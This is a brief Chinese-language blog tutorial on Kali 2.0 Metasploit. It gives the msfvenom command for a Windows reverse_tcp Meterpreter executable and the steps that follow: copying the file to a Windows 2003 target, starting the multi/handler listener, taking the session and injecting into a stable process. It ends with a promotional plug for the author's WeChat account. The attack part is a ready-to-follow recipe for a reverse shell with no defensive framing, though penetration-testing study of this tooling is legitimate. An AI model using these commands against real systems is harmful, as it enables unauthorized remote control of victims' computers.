# Kali2.0 Meterpreter 运用
初试牛刀
(1)生产EXE 就用meterpreter (shell 一个含义) (KALI2.0以前版本 为 msfpayload )2.0后 新命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f exe > 1234.exe
1
(2)默认生成地址是 ROOT 查看 后 直接经 物理机 复制进入目标机 WIN2003
(3)打开之前,监听机 先打开 监听
use exlpoit/multi/handler
1
(4)目标机 打开 EXE 后 发生回话 用 sessions -v 查看
(5)选择要的回话窗口 session -i 1 成功进入 meterpreter
输入 ? 进行试验 ,选定稳定进程注入。
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!